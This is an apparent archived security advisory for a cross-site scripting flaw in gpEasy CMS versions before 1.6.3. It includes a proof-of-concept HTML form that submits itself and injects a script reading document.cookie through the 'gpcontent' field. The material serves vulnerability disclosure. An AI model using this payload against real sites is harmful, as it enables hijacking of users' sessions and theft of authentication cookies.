15 lines
No EOL
764 B
Text
15 lines
No EOL
764 B
Text
source: https://www.securityfocus.com/bid/40330/info
|
|
|
|
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
|
|
|
Versions prior to gpEasy CMS 1.6.3 are vulnerable
|
|
|
|
<form method="POST" action="http://example.com/index.php/Home" name="myfrm">
|
|
<input type="hidden" name="cmd" value='save'>
|
|
<input type="hidden" name="gpcontent" value='text"><script>alert(document.cookie)</script>'>
|
|
</form>
|
|
<script>
|
|
document.myfrm.submit();
|
|
</script> |